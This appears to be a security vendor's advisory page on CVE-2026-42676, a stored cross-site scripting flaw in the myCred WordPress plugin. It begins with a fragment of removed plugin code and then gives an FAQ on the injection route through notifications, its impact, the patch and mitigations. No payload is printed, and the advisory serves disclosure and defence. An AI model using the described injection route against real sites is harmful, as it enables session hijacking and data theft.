- if ( $type_id != MYCRED_DEFAULT_TYPE_KEY )
- $type_slug = MYCRED_SLUG . '_' . trim( $type_id );
-
- $pages[] = add_menu_page(
- $title,
- $title,
- $mycred->get_point_editor_capability(),
- $type_slug,
- '',
- $menu_icon
- );
-
- }
-
- // Add styling to our admin screens
- $pages = apply_filters( 'mycred_admin_pages', $pages, $mycred );
- foreach ( $pages as $page )
- add_action( 'admin_print_styles-' . $page, array( $this, 'fix_admin_page_styles' ) );
-
- // Let others play
- do_action( 'mycred_add_menu', $mycred );
-
- }
-
- /**
- * Toolbar
- * @since 1.7
- * @version 1.0.1
- */
- public function adjust_toolbar( $wp_admin_bar ) {
-
- if ( ! is_user_logged_in() || ( defined( 'DOING_AJAX' ) && DOING_AJAX ) || apply_filters( 'mycred_admin_show_balance', true ) === false ) return;
-
- global $mycred;
-
- $user_id = get_current_user_id();
- $usable_types = mycred_get_usable_types( $user_id );
- $history_url = admin_url( 'users.php' );
-
- if ( empty( $usable_types ) ) return;
-
- $using_buddypress = false;
- if ( function_exists( 'bp_loggedin_user_domain' ) )
- $using_buddypress = true;
-
- $main_label = __( 'Balance', 'mycred' );
- if ( count( $usable_types ) == 1 )
- $main_label = $mycred->plural();
-
- // BuddyPress
- if ( $using_buddypress ) {
-
- $wp_admin_bar->add_menu( array(
- 'parent' => 'my-account-buddypress',
- 'id' => MYCRED_SLUG . '-account',
- 'title' => $main_label,
- 'href' => false
- ) );
-
- if ( isset( $mycred->buddypress['history_url'] ) && ! empty( $mycred->buddypress['history_url'] ) )
- $history_url = bp_loggedin_user_domain() . $mycred->buddypress['history_url'] . '/';
-
- // Disable history url until the variable needed is setup
- else
- $history_url = '';
-
- }
-
- // Default
- else {
-
- $wp_admin_bar->add_menu( array(
- 'parent' => 'my-account',
- 'id' => MYCRED_SLUG . '-account',
- 'title' => $main_label,
- 'meta' => array( 'class' => 'ab-sub-secondary' )
- ) );
-
- }
-
- // Add balance and history link for each point type
- foreach ( Frequently Asked Questions
What is CVE-2026-42676?
Overview of the vulnerabilityCVE-2026-42676 is a Stored Cross-Site Scripting (XSS) vulnerability found in the myCred plugin for WordPress, affecting versions up to 3.0.4. It allows authenticated users with subscriber-level access or higher to inject arbitrary scripts into notifications that execute when other users view the affected pages.
How does the vulnerability work?
Mechanism of exploitationThe vulnerability arises from insufficient input sanitization and output escaping in the notification handling process. An authenticated attacker can manipulate log entries to include malicious scripts, which are then stored and executed in the context of users accessing the affected pages.
Who is affected by this vulnerability?
Identifying affected users and sitesAny WordPress site using the myCred plugin version 3.0.4 or earlier is at risk, particularly those allowing subscriber-level user registrations. Administrators should check their plugin version and user roles to assess exposure.
How can I check if my site is vulnerable?
Steps for vulnerability assessmentTo determine if your site is vulnerable, check the version of the myCred plugin in use. If it is version 3.0.4 or earlier, and you have users with subscriber-level access or higher, your site is at risk of this vulnerability.
What is the severity level of this vulnerability?
Understanding the CVSS scoreCVE-2026-42676 has a CVSS score of 6.4, indicating a medium severity level. This means that while it requires authentication to exploit, it can lead to significant client-side impacts, including data theft and unauthorized actions.
How can I mitigate or fix this vulnerability?
Recommended actions for administratorsTo mitigate this vulnerability, update the myCred plugin to version 3.0.5 or later, where the issue has been patched. Regularly check for updates and apply them promptly to maintain site security.
What practical risks does this vulnerability pose?
Potential impacts on users and dataSuccessful exploitation of this vulnerability allows attackers to execute arbitrary JavaScript in the context of any user viewing the affected pages. This can lead to session hijacking, unauthorized actions, and data exfiltration.
What is a proof of concept (PoC) for this vulnerability?
Demonstration of the exploitThe proof of concept for CVE-2026-42676 illustrates how an authenticated user can inject a malicious script into the notification system. By manipulating a transient with an XSS payload, the attacker can execute scripts when the victim loads any page.
How does the patch address the vulnerability?
Changes made in the updated versionThe patch for CVE-2026-42676 improves input sanitization and output encoding in the notification handling code. It ensures that user inputs are properly sanitized before being rendered, preventing script injection.
What should I do if I cannot update the plugin immediately?
Short-term mitigation strategiesIf immediate updates are not possible, consider disabling the myCred plugin temporarily or restricting access to subscriber-level users until you can apply the patch. Additionally, monitor user activities for any suspicious behavior.
Are there any specific coding changes in the patch?
Technical details of the fixYes, the patch modifies the way notifications are processed by applying `wp_unslash()` and `wp_json_encode()` to the notification messages, ensuring that potentially harmful scripts are not executed when rendered in the browser.
Where can I find more information about this vulnerability?
Resources for further readingFor more information, you can refer to the official CVE database, security advisories from the myCred plugin developers, and community discussions on WordPress security forums.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
